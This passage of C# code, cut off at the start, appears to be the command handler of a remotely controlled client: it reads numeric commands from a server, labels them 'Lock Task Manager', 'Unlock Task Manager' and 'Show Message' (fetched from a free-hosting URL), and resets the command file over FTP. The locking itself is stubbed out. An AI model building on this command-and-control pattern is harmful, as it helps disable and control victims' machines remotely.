witch(cmd) 
         {
            case 0: {
               Log.Add("There is no command in server file");
               break;
            }
            case 1: { // Лок дз
                  try 
                  { 
                     Console.WriteLine("1"); 
                     Log.Add("Received command \"Lock Task Manager\" -> Successfull");
                     try {
                        FTP.Upload("cmd1.txt");
                        Log.Add("Uploaded new clear command file");
                     }
                     catch (Exception er) { Log.Add("Received command \"Lock Task Manager\" -> Error: "+er.ToString()); }
                  } 
                  catch (Exception er) { Log.Add("Locking Task Manager -> Error: "+er.ToString()); }
                  break;
            }
            case 2: { // Анлок дз
                  try 
                  { 
                     Console.WriteLine("2"); 
                     Log.Add("Received command \"Unlock Task Manager\" -> Successfull");
                     try {
                        FTP.Upload("cmd1.txt");
                        Log.Add("Uploaded new clear command file");
                     }
                     catch (Exception er) { Log.Add("Uploading new clear command file -> Error: "+er.ToString()); }
                  } 
                  catch (Exception er) { Log.Add("Received command \"Unlock Task Manager\" -> Error: "+er.ToString()); }
                  break;
            }
            case 3: { // Сообщение
                  try 
                  {
                     string msg = http.DownloadString("https://suriv123.000webhostapp.com/msg.txt");
                     Console.WriteLine(msg);
                     Log.Add("Received command \"Show Message: "+msg+"\" -> Successfull");
                     try {
                           FTP.Upload("cmd1.txt");
                           Log.Add("Uploaded new clear command file");
                     }
                     catch (Exception er) { Log.Add("Uploading new clear command file -> Error: "+er.ToString()); }
                  }
                  catch (Exception er) { Log.Add("Received command \"Show Message:\" -> Error: "+er.ToString()); }
                  break;
            }
            default: {
               Log.Add("Unknown command: "+cmd);
               break;
            }
         }